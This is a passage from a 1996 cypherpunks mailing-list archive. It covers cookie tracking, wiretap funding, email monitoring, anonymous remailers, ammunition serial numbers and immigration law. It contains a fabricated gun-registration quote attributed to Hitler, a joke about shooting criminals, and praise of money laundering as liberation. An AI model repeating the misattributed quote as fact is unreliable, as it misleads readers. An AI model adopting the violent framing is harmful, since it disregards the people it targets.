won't be able to verify your age.

None of that is really proof of citizenship - after all, you could 
have renounced your US citizenship and become stateless or joined 
a foreign government.  But President Buchanan's loyalty oath requirements
should take care of that, as well as help with the problem of all these
immigrant Brits and Irish and Canadians flooding our shores - I mean,
look around you, they're everywhere.  Y'all can't walk into a 7-11 these days
without some clerk speaking funny-soundin' English at you.

And the reason you can't legally just hire contractors and not have them
count as employees has a lot to do with Senator Frank Lautenberg (D-NJ),
who made a lot of money running ADP, a computer-services bodyshop,
that wanted to preserve its advantages against more flexible competition.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 7 Aug 1996 20:24:07 +0800
To: cypherpunks@toad.com
Subject: Stealth cookies
Message-ID: <199608070259.TAA17434@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



At 03:48 PM 8/5/96 -0400, Anne Eisenberg <aeisenb@duke.poly.edu> wrote:
>All of the discussion on the list to do with
>cookies is related to Netscape.  Does this mean that if one switches to
>Microsoft Explorer one can avoid the problem?  Many thanks.

MSIE also does cookies.  Netscape 3.0b5 has a nice option to let you
choose whether to accept a cookie or not.  However, what's the problem
you're trying to solve?  Sites have several ways to find out information
about you, which they can use immediately or coordinate with other things
0) Stuff the site knows about itself, like contents and time
1) Stuff you tell them by filling in forms
2) Your IP address (not always very useful...)
3) Information your browser sends (somewhat adjustable.)
4) Information your browser sends that a site asked you to keep for it
        (i.e. cookies.)

For the most part, this doesn't leak a lot of information;
even cookies can only pass things the sites already knew between sessions.
The cookie spec is well-designed, only allowing cookies to be retrieved
by the machine or domain that set them in the first place.

However, there's a way to cheat the cookie spec; I don't know
if this was intentional, but it was realized quickly by the market :-)
The issue is that your browser sends along an HTTP_REFERRER variable,
which points to the last page you visited before the current page.
It's useful for sites to find out where their pages are being referenced,
and they may (legitimately) want to only give out information if you're
coming from one of their previous pages.  This does also mean that
a page (www.alice.com/interesting.html) can hand its name to another page
or program (www.bob.com/cgi/count-stuff.pl)  by including an inline reference
to it.  But that site can send your browser a cookie marked bob.com, which is 
accessible by _it_, not by the referring page.  This means that 
if you later connect to www.carol.com/foo.html, which references bob's
count-stuff program, bob.com can retrieve the bob.com cookie that 
has information about your connection to alice.com.  If alice.com and
bob.com store some identifying information (e.g. alice.com records
a connection from 192.9.200.1 at 12:34:59 UTC, and bob.com records 
a connection from 192.9.200.1 at 12:35:01 UTC, and bob.com stores a reference
to that in the cookie (either storing the information directly, or more
likely, storing a record-id number referencing a database entry,
and carol.com and bob.com similarly share a reference, then alice, bob,
and carol can coordinate what happened in the two sessions.
Maybe Bob just knows that there's market correlation between viewers of
Alice's Brownie Company and Carol's Congressional Consulting, or maybe
they also share the credit card number, flavors, and addresses you gave
alice.com
with the search criteria you gave carol.com to find you've been donating
special brownies to that congresscritter you've been lobbying.
Without the cookie hack, the ability to correlate is limited to the
common information that you've given the two sites, which tells
them that some Netcom user with Mozilla 3.2b7.7 did it,
which isn't enough to run a targeted campaign donation request
or send out the FBI or whatever.

Doubleclick.com is the site that's wellknown for exploiting the feature,
and their web site is interesting.  If you're using 3.0b5, try
different combinations of accepting or rejecting cookie requests....

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 7 Aug 1996 19:12:55 +0800
To: cypherpunks@toad.com
Subject: Re: Freeh slimes again: Digital Telephony costs $2 billion now  ...
Message-ID: <199608070259.TAA17442@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>>> Louis Freeh is now asking the Congress for $2 billion to fund
>>> Digital Telephony.  Yes, that is FOUR TIMES what he said it

>How many crimes, approximately, are going to be solved or prevented by the 
>expenditure of this $2 billion dollars?  One hundred?  A thousand? 

I haven't been able to find the reference, but a month or two ago
there was an article on the net or in a newspaper about the targets
of wiretapping - how many wiretaps were for drugs, gambling, tax evasion,
and of course terrorism.  The number of wiretaps for bombs and guns
was something low like 80 in the last 5-10 years - about 1/10%. 
        (Did anybody else see this article??)
On the other hand, the recent articles in the press about increasing
bomb-related crimes in the US; it's up to about 3000/year from 2000 in 5 yrs.
So maybe 1/10% of the bombing investigations  have even used wiretapping.

So why is Louis Freeh ranting up and down about the need to
ban encryption because he needs wiretapping to catch terrorists?
At least he could be honest and rant about the need to stop the
hordes of drug dealers and escalate the War On Gambling.


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 7 Aug 1996 19:13:00 +0800
To: cypherpunks@toad.com
Subject: Re: Corporate e-mail policy
Message-ID: <199608070259.TAA17453@toad.com>
MIME-Version: 1.0
Content-Type: text/plain




>    "Electronic mail may be monitored if there is sufficient reason to
>     believe that it is being improperly used which includes, but is not
>     limited to: mail to competitors, more than 20 recipients (spam), and
>     incoming mail from questionable sources.  If such monitored mail is
>     encrypted the employee must provide a clear text version of the mail
>     which is to be unencrypted under supervision to avoid substitutions.
>     Any employee refusing to make available such mail will be ...."

Official mail to competitors, the press, or customers is probably something
you'd want an official copy of anyway, and the employee should be
able to decide intelligently what to keep (unless your lawyers say
to always keep everything, in which case the legal department should
be responsible for maintaining the archives....)

Incoming encrypted mail you can (presumably) get an employee to decrypt.
Outgoing encrypted mail may not support that - PGP, for instance,
supports an encrypt-to-self option, but if you don't use it,
and didn't record the outgoing message, you _can't_ decrypt it.
Writing something into a policy that will get an employee fired
for refusing to do something that can't be done with the available tools
is not a good idea.  I'm not highly impressed with the idea of 
snooping on employees' mail, even if it _is_ your company.
If you don't trust them, don't hire them.  If you do trust them,
don't eavesdrop.   And if they're ripping you off and don't have the sense
to sneak their sotlen data outside the building by sneakernet
or other untappable mechanism, you probably should have fired them
for incompetence long ago anyway.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Wed, 7 Aug 1996 18:18:21 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Stop the presses -- Anti-terrorism bill not that bad
In-Reply-To: <199608062350.QAA18315@web.azstarnet.com>
Message-ID: <9608070000.AA01836@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>Oh goody! Another Hallam-Baker-generated p*ssing contest.  Perhaps you
>fellows should settle your differences with a bet. Oops, I forgot. The good
>"Doc" dishonors his wagers with a series of fantastic and infantile
>"misunderstandings".

Actually I'm now happy to accept the bet but in the forum of my choice:-

http://www.ideosphere.com/ideosphere/fx/main.html


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 7 Aug 1996 20:41:24 +0800
To: cypherpunks@toad.com
Subject: Talking about Crypto Anarchy
Message-ID: <ae2d4666190210046ce1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I'm going to use John's comments as a jumping off point for some things I
probably should have said a while ago.

At 11:15 PM 8/6/96, John Young wrote:
>I'd like to hear Tim, too, in this Big Apple. RealAudio, perhaps.
>
>Tim's views are far more substantial and worthwhile than those play-it-safe
>Pro-Code dronings.
>
>And his pith should go out far and wide, around the world, not only out
>there on its edge.
>
>Vinnie, Robert, All Appledom, do your global duty, don't miss this chance
>to leapfrog the small-beans promoters of the crypto industry.
>
>What would you offer to set off Tim's simmering crypto-anarcho-volcano,
>make it heard round the planet?

As I think I made clear, there is little either Vinnie or Bob have "failed"
to do. I'll explain this below. It is true that I am not much of a fan of
Bob's writing style, with nuggets of truth buried in bloviations about
sacks of grenades, rubber rafts, shaking trees, pieces of the true cross,
ad nauseum, but, then, "style" is something I tend to react to perhaps more
than most. (Not the variations in style of the hundreds of folks who post
here, but the florid excesses so common in "neo-journalism," where it seems
the writers are paid by the word--as perhaps they are--and wrap their few
nuggets in stock phrases and cutesy pastiches of Chandler, Wolfe, Gibson,
Joyce, and the whole Sick Crew.

Back to important issues. Let me summarize:

1. A while back there was an announcement (I thought by Vinnie, but he
denied it to me) of a "Mac Crypto" mailing list. This announcement, which I
no longer have (not in my own archives, and not in the few CP archives that
seem to still be reachable on the Web) mentioned that the list would focus
on "real" cryptography, and _not_ on political issues (including,
presumably, the main topics that have motivated my contributions for the
past several years, and longer).

Fair enough, as the owner/maintainer of a list is free to set his policies.
I of course did not join this list, as I don't think a list which only
discussed quadratic residues and elliptic curve methods is exactly my cup
of tea...there are plenty of textbooks and other lists for this.

2. So, when Vinnie sent me his "Mac Crypto Needs You!" mini-rant, my
natural conservatism toward such things kicked in. I am not, as must be
clear now, one of those "Rah rah rah! We need to evangelize crypto!" folks.
I take a neo-Calvinist position on such things. Hustling memes is
distasteful to me. (Some will say my posts here are an attempt to sell my
ideas. Fair enough, but this is a forum I find acceptable.)

3. I told Vinnie I was not interested, that giving a "pep talk" to Mac
developers is not my thing, and that if my views on politics, crypto
anarchy, the undermining of governments, money-laundering as a tool of
liberation, etc., were not deemed acceptable for his list, then I would not
feel welcome at Apple Computer talking about the same. (In his reply, he
said he'd never said any such thing about politics not being welcome on Mac
Crypto....I could have sworn I saw such a thing, but, like I said, I can't
find this message anywhere I've looked.)

4. Blah blah blah. That is, you saw my longer article I sent to Vinnie,
explaining why I was not too interested. I won't repeat the points here.

5. I thought the subject was closed, as Vinnie then said that perhaps I was
_not_ the right person after all. I agree with this. I am not an
"evangelist," at least not one in the mold of the ever-bubbly Guy Kawasaki.
Nor am I in the mold of a Robert Hettinga. Maybe I'm more like H.L.
Mencken, or, at least I'd like to be.

Evangelists disgust me. I can't read anything Kawasaki gibbers about, nor
can I read the neo-journalism of "Spencer Katt," "Mac the Knife," or
"Robert X. Cringely."

(If you don't recognize these names, these are the terminally-hip gossip
columnists and "rumormongers" of the three leading trade rags. The style is
pretty similar to that used by Brock Meeks, Robert Hettinga, and the like.)

Now on the the Big Issue.

6. I've given up on discussing crypto anarchy in short talks because nearly
nobody in the audiences I've done it for has the foggiest notions of what
I'm talking about, and I've found no short, sweet, simple methods of
getting across the implications. Many audiences have no idea of how public
key encryption even works, let alone how digital money might work.

(Thus, panel discussions on "cryptography" bog down almost immmediately on
basic issues. There's no way to get to the "juicy" stuff when 20 minutes is
spent trying to educate an audience about what a prime number is!)

Consider how long it takes a new subscriber on this list, one who
presumably heard about this list from a background of some familiarity with
the idea of encryption, to get to the point of understanding what the terms
and phrases in my sig mean. I'd say it takes at least several weeks, with
detours into Schneier to read up on the basics, and some mental effort to
think through how anonymous remailers work, what digital money might mean
for tax collection, etc.

Even at the Hacker's Conference, which I last attended in 1993, the
discussions of cryptography were deeply unsatisfying to me. My panel, on
crypto, bogged down in trying to get across to a technically pretty
competent audience the implications of strong crypto. Clearly, the hour or
so we had was not enough, and people could only get the barest glimpses.

7. In several radio talk shows I have done, the same is true. Given that
there just isn't enough time for a careful explication of the necessary
background, the discussion and the questions from callers to the show stay
at the most basic level. While I am not dismissing the importance of basic
questions, it's clear that the discussion can never move on.

Thus, discussions tend to never get beyond the "think of crypto as
envelopes...would you want your messages all on postcards?" level. (This
envelope-postcard analogy is of course due to Phil Z., and he seems more
comfortable than I in giving this kind of talk over and over again.)

8. Even articles in "Liberty" and "Reason" magazines (plus more obscure
magazines like "Extropy") have to spend most of the article explaining the
basics, ending with a glimpse into a few topics of more recent vintage.
Mostly, it is hopeless to get into "crypto anarchy," when the article is
about how public key encryption works.

(Note: This observation is part of a larger issue about the difficulties of
building on past work. It is why so many fractious debates never get beyond
the opening salvos...over and over again. The debate over nuclear power (or
gun rights, or...) comes to mind, and I have, as with crypto anarchy, given
up on trying to "convince" groups of the truth of my views: nearly everyone
I talk to is so ignorant of the basics of radiation, containment, half
lives, ionizing radiation damage, alternatives, etc., that all discussions
bog down at the most basic of levels. When I used to have the energy--and
the foolishness--to bend someone's ear about nuclear power for a couple of
hours, I could _sometimes_ see the glimmerings of a change in positions,
the flicker of a change in preconceived notions. Mostly there was only
blankness and hostility. I get the same reaction when I try to explain the
techno-libertarian implications of strong cryptography.)

9. So, while John Young and others might want like that my "pith should go
out far and wide, around the world, not only out there on its edge," the
plain fact is that it can't go out in a talk lasting only a few hours, or,
much more likely, lasting less than an hour.

Certain after dinner speakers are adept at getting one or maybe two simple
points across in a talk--usually with some judicious humor to drive the
point home--but I am not one of them. Maybe one of you is, but not me. In
any case, getting "one or two ideas across" is not of much interest to me.

(I've also seen David Chaum struggle to just get the basic idea of
"credentials without identity" across to a tecnical audience...even when he
concentrates on only getting a single facet of his ideas across, the light
bulbs just don't go off in the heads of the audience members...at least
this was what I witnessed.)

I know there are some lawyers and law professors on this list, so the
analogy to law might be useful. To wit, can a lawyer or professor be
expected to really explain to a lay audience some complicated subject? Or
is a series of ground-laying lectures needed first? While there are
presumably lawyers willing to give pleasant after-dinner speeches on, say,
"tort reform," I suspect that very little information is conveyed to lay
audiences. (And, as I've said, I am not a talented dinner speaker.)

10. Finally, I am not a "motivational coach." I don't give pep talks to
people at companies to help them save their companies, or their platforms.
Thus, I am not interested in giving a "go out and win one for the Gipper!"
pep talk at Apple.

I hope this makes things clearer. And bear in mind that I actually _did_
spend a vast amount of my time putting together a compendium of my thoughts
and ideas in my "Cyphernomicon." [ URL:
http://www.oberlin.edu/~brchkind/cyphernomicon/ ] At more than a megabyte,
and with various chapters on crypto anarchy, anonymous markets, remailers,
and all sorts of implications, it is the fullest embodiment of my thinking
extant in any one place. Some say it would make for a start on a book, but
I can't see any publishers rushing to publish such a book (one publisher
asked me to "submit a proposal" for a book on how to use PGP...this is the
level of what publishers want from me...needless to say, I discarded his
business card immediately).

And so it goes. I'm not interested in giving a pep talk to Apple or its
developers, I outlined my reasons in other messages. And I don't believe
there's any way to adequately explain the collection of ideas I call
"crypto anarchy" in much less than a lecture series. Even if someone were
to sponsor or arrange such a lecture series, as has been done for things
like nanotechnology, I'd have to think long and hard about committing to
this. My inclination is to tell those who ask for such a talk or lecture
series to "RTFM."

Regards,

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 7 Aug 1996 20:33:40 +0800
To: cypherpunks@toad.com
Subject: Re: Apple people on the list
Message-ID: <v02120d03ae2db5810751@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 16:15 8/6/96, John Young wrote:

>What would you offer to set off Tim's simmering crypto-anarcho-volcano,
>make it heard round the planet?

Bottle o' Scotch (my private stash). Free Ecash account.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 7 Aug 1996 17:03:47 +0800
To: jfricker@vertexgroup.com>
Subject: Re: Stealth cookies
Message-ID: <v02120d04ae2db6282eb6@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 17:49 8/6/96, Jeff Weinstein wrote:
[...]
>  This was a bug that existed for a short time, and was fixed about
>6 months ago.  Javascript can not submit mailto: forms at all, and
>all mailto: forms now cause a warning dialog to come up(the dialog
>can be turned off in preferences).

You have done a lot to improve security. It is not going unnoticed.


-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 7 Aug 1996 19:31:11 +0800
To: cypherpunks@toad.com
Subject: Re: Censorship through proxy
Message-ID: <v02120d05ae2db6d15662@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 18:12 8/6/96, Timothy C. May wrote:

>I wonder what would happen if "Computers, Freedom, and Privacy '98" was
>held in Sing Sing?

We'd all get caned?



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienk@ix.netcom.com
Date: Wed, 7 Aug 1996 18:18:24 +0800
To: cypherpunks@toad.com
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
Message-ID: <199608070325.UAA22254@dfw-ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 06 Aug 96, hallam@Etna.ai.mit.edu wrote:
>
>Contrary to reports of some sort of inversion it is not the case that
>shell cases need to be found at the scene of a crime to cause an
>arrest and conviction. There are many people who are serving time
>after having left their fingerprints on shell cases found in a gun
>recovered after a crime. If the gun can be linked to a crime scene
>via balistics reports and the shells in the gun to an individual via
>fingerprints that is circumstansial evidence.

I am very skeptical of this. When a gun is fired, the shell casing becomes quite 
hot--hot enough to burn skin. (I have learned this from experience--once when 
firing my semi-auto .22 at a range, an ejected casing bounced off a post next to 
me and landed inside my collar. The resulting burn formed a blister on my neck.) 
This kind of heat has a tendency to evaporate the skin oils that fingerprints 
are composed of, which is going to make getting any useful print from the case 
extremely difficult. Also, when the gun is fired, the pressure inside the case 
presses it flat against the chamber wall, which is going to smudge the print, 
especially on semi-autos where extraction occurs while there is still a 
significant amount of pressure in the case. Furthermore, most shell cases are 
too small to get anything close to a complete print, which makes positive 
matching even more difficult. It is much more believable that prints were taken 
from the gun, which is handled more (thereby collecting more prints) and which 
generally doesn't reach skin-damaging temperatures.

Regardless of feasibility of collecting prints from cases, serial numbers on 
ammunition is still a stupid idea. Currently, all firearms are required to have 
serial numbers. However, serial numbers only rarely help solve crimes. Most 
criminals use weapons that have had the serial number welded over, filed off, 
etc. or that have been stolen, so the gun is registered in someone else's name, 
or both. Registration is a vastly more effective tool for the government to know 
where most of the lawfully owned firearms are (and who owns them) than it is at 
preventing or solving any crime. Putting serial numbers on ammo has all of the 
same problems, except the paperwork would be worse because people purchase ammo 
more frequently than guns.

Imagine someone breaks into your house while you are gone, and steals your 
serial-numbered gun and serial-numbered ammo. Then he uses them to stick up some 
of the local Stop-N-Rob's in your neighborhood while wearing the same gloves and 
ski mask he wore at your house. He fires numerous shots and reloads the gun 
several times, leaving fired cases in each store. After the last robbery, he 
dumps the gun in a storm drain, burns the gloves and mask, and catches the next 
flight to Tahiti. Do you really think that serial numbers on the gun or the ammo 
are going to help YOU?

Also, 32 bits of serial number is not enough. Over a billion rounds of .22 Long 
Rifle are fired in the US annually. Need I say more?

Since there are already natural means of positively matching bullets to guns, 
guns to cases, and guns to fingers, which cannot be used to falsely implicate 
anyone, , and since the claimed benefits of serial numbering can easily be 
circumvented by unscrupulous persons (in other words, CRIMINALS) I contend that 
serial numbers are a much better tool for facilitating a police state than for 
reducing crime.

On Tue, 6 Aug 1996, Rabid Wombat <wombat@mcfeely.bsfs.org> wrote:
>How about just numbering the criminals?  There's more room for the 
>numbers, there's precedent, and less specialized equipment is required.

obCrypto: How about defining the "number" as an MD5 hash of the X-Y coordinates 
of the entry points of 15 pellets of 00 buckshot in the criminal's chest, sorted 
in ascending order X, Y? (ORDER BY X ASC, Y ASC)
Jonathan Wienke

[End of gun rant. Sorry for burning up so much list bandwidth on this, but I 
recently had an experience where gang members were following me around for 
several weeks, trying to intimidate me from testifying against some of their 
friends who beat the crap out of some of my neighbors with sawed-off baseball 
bats... "Cold, dead, fingers" and all of that.]

"A conservative is a liberal who got mugged last night."
--Lee Rodgers

"1935 will go down in history! For the first time a civilized nation has full 
gun registration! Our streets will be safer, our police more efficient, and the 
world will follow our lead in the future!"
--Adolf Hitler

"46.  The U.S. government declares a ban on the possession, sale, 
transportation, and transfer of all non-sporting firearms. ...Consider the 
following statement:  I would fire upon U.S. citizens who refuse or resist 
confiscation of firearms banned by the U.S. government."
--The 29 Palms Combat Arms Survey  
http://www.ksfo560.com/Personalities/Palms.htm

1935 Germany = 1996 U.S.?

Key fingerprint =  30 F9 85 7F D2 75 4B C6  BC 79 87 3D 99 21 50 CB





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Wed, 7 Aug 1996 15:03:39 +0800
To: cypherpunks@toad.com
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
In-Reply-To: <19960805204130906.AAB148@maverick>
Message-ID: <32080CFD.15FB@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


For anyone who's interested, the antiterrorism bill is finally up on
Thomas.  It's H.R. 3953, the Aviation Security and Antiterrorism Act of
1996.  The discussion about it is also there, in the congressional
record.  It's interesting.

-- 
You should only break rules of style if you can    | Tom Weinstein
coherently explain what you gain by so doing.      | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 7 Aug 1996 20:55:53 +0800
To: cypherpunks@toad.com
Subject: Re: Censorship through proxy
Message-ID: <199608070331.UAA03775@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:12 PM 8/6/96 -0700, Timothy C. May wrote:
>Sing Sing (the country is now a prison, so...) is one of the states we
>should think about targetting for "special attention." Not in the sense of
>violence, but in the sense of offering help to freedom fighters, those who
>want to use stego, web proxies, etc.
>
>I wonder what would happen if "Computers, Freedom, and Privacy '98" was
>held in Sing Sing?


A friend of mine, who occasionally visits Singapore on business, told me 
this Singaporean joke:

"Singapore is a fine place.  There's a fine for this, and a fine for that,..."

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 7 Aug 1996 22:25:14 +0800
To: cypherpunks@toad.com
Subject: Anonymous Remailers at work
Message-ID: <199608070405.VAA19000@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


One of the big problems with remailers is getting them deployed widely.
How can we create a demand for the service that will encourage
people to both (a) deploy them and (b) think of them as good rather than bad?
Aside from cypherpunks, spammers, and everyone using anon.penet.fi, 
there aren't really a lot of people familiar with them.

I've recently run into a couple of business problems at work
that could be solved by (slightly modified) remailers.

1) Manager performance review, suggestion boxes, and questions to
visiting honchos - there are several departments that are using
"email to the secretary who'll take your name off and forward it"
to handle this problem.  Remailers are an obvious solution.
   (More obvious if we weren't using (gack, phfft!) Microsoft Mail :-)
It would probably be worth modifying the remailer to use a permit-list
as well as a block-list for destinations and maybe sources, 
so that companies don't get surprised by outside spammers,
and people can get used to using the things at work.
Distribute the thing as an OmbudsKit or whatever.
You'd obviously want the default to be non-logging.

2) Sending sensitive email across the real Internet - between
customers, and for those days that the departmental dialup
mail server or remote LAN access isn't working and you need to 
send something from home or on the road.  A standard remailer would
do the job, though you'd probably want to add a permit-list,
and you might want to add logging and/or return receipts.
Mail to pgprelay@foobar.com and it distributes it....
(Requires putting a key somewhere well-known, like in DNS
or on the key servers.)

(Hmmm - an alternative implementation is to use a CGI script
to do the mailing and use SSL; some companies may find
this easier to deploy, depending on their firewall 
configurations.)

(Does it make sense to deploy something like this as a 
standard feature of an IPSP gateway system like John's?)

Any other reasons to install anonymous remailers at work,
and things you'd do to make them more attractive or
less scary to corporate network administrative types?

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 7 Aug 1996 13:54:14 +0800
To: hallam@ai.mit.edu (Hallam-Baker)
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
In-Reply-To: <3207B8DD.794B@ai.mit.edu>
Message-ID: <199608070205.VAA17482@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Hallam-Baker wrote:
> Alan Horowitz wrote:
> >   I have added you to my computerized list of individuals who advocate
> > the violent overthrow of the US Constitution.
> > 
> > I am going to go to the law library and see what my options are, with
> > respect to filing a petition to have you deported out of the United
> > States.
> > 
> > This is not a rhetorical statement.
> 
> First off Alan posted private mail to the list. In this case mail
> that was more than simply personal. 
> 
> Secondly unless Alan withdraws his allegations I will bring proceedings
> against him for libel. While I accept his right to free speech I do
> not accept that he has a right to attempt to restrict mine with his
> threats of deportation. 

Relax, nobody will deport you. Once The Right Reverend Colin James III
(puke) tried to get me deported, with no result.

And unlike Horowitz, CJ3 was serious. CJ3 is much dumber than Horowitz 
though, in my opinion.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 7 Aug 1996 21:08:40 +0800
To: cypherpunks@toad.com
Subject: Re: Internal Passports
In-Reply-To: <2.2.32.19960806103803.0090e254@panix.com>
Message-ID: <RDo0RD45w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell <frissell@panix.com> writes:
> At 12:06 AM 8/6/96 -0700, Marshall Clow wrote:
>
> >I have found that promising to provide the necessary docs, and then failing
> to do so, is the least confrontational and most effective way around this.
> >
> >"Delay is the deadliest form of denial"
>
> Works for me as well.  Likewise, self employment.

That's the key word here - I don't think you need I-9 if you get paid on 1099
or equivalent. However for W-4 employment, the emplyer must send a signed I-9
to los federales. Otherwise the computer will flag this situation and they'll
get a letter asking why they pay wages to someone whose I-9 isn't on file.
I suppose when the person is "obviously" U.S.-born, the h.r. people might lie
and say on I-9 that they saw a document. Then again, I've seen folks who looked
and spoke more American (or German-Swiss, or Romanian) than most natives. :-)

By the way, another advantage of 1099 is that if you have your corporation,
you give its EIN, not your SSN to the clients, whom you don't necessarily
want to know your SSN.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 7 Aug 1996 23:49:52 +0800
To: cypherpunks@toad.com
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
In-Reply-To: <3207B8DD.794B@ai.mit.edu>
Message-ID: <7No0RD46w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Phil Hallam-Baker <hallam@ai.mit.edu> writes:
> Alan Horowitz wrote:
>
> >   I have added you to my computerized list of individuals who advocate
> > the violent overthrow of the US Constitution.
> >
> > I am going to go to the law library and see what my options are, with
> > respect to filing a petition to have you deported out of the United
> > States.
> >
> > This is not a rhetorical statement.
>
> First off Alan posted private mail to the list. In this case mail
> that was more than simply personal.
>
> Secondly unless Alan withdraws his allegations I will bring proceedings
> against him for libel. While I accept his right to free speech I do
> not accept that he has a right to attempt to restrict mine with his
> threats of deportation.

Alan, look at (3)(A)(iii) of the relevant statute. (3)(B) might also apply.

Section 212 (a) of the Immigration and Nationality Act (8 U.S.Code 1001, et
seq., as amended by Public Law 101-549 of November 29, 1990), reads as follows:

Classes of Excludable Aliens - Except as otherwise provided in this Act, the
following describes classes of excludable aliens who are ineligible to receive
visas and who shall be excluded from admission into the United States.

(1) HEALTH - RELATED GROUNDS.--
 (A) IN GENERAL. -- Any Alien--
  (i)   who is determined (in accordance with regulations prescribed by the
        Secretary of Health and Human Services) to have a communicable disease
        of public health significance,
  (ii)  who is determined (in accordance with regulations prescribed by the
        Secretary of Health and Human Services in consultation with to Attorney
        General)--
   (I)   to have a physical or mental disorder and behavior associated with
         the disorder that may pose, or has posed, a threat to the property,
         safety, or welfare of the alien or others, or
   (II)  to have a physical or mental disorder and a history of behavior
         associated with the disorder which behavior has posed a threat to the
         property, safety, or welfare of the alien or others and which
         behavior is likely  to recur or to lead to other harmful behavior or
  (iii) who is determined (in accordance with regulations prescribed by the
        Secretary of Health and Human Services) to be a drug abuser or addict,
      is excludable.
 (B) WAIVER AUTHORIZED.--
  For provisions authorizing waiver of certain clauses of subparagraph (A),
  see subsection (g).

(2) CRIMINAL AND RELATED GROUNDS.--
 (A) CONVICTION OF CERTAIN CRIMES.--
  (i)   IN GENERAL.-- Except as provided in a clause (ii), any alien convicted
        of, or who admits having committed, or who admits acts which constitute
        the essential elements of--
   (I)   a crime involving moral turpitude (other than a purely political
         offense), or
   (II)  a violation of (or a conspiracy to violate) any law or regulation of a
         State, the United States, or a foreign country relating to a
         controlled substance (as defined in section 102 of the Controlled
         Substances Act (21 U.S.C. 802)),
        is excludable.
  (ii)  EXCEPTION.-- clause (i)(I) shall not apply to an alien who committed
        only one crime if--
   (I)   the crime was committed when the alien was under 18 years of age and
         the crime was committed (and the alien released from any confinement
         to a prison or correctional institution imposed for the crime) more
         than 5 years before the date of application for visas or other
         documentation and the date of application for admission to the United
         States, or
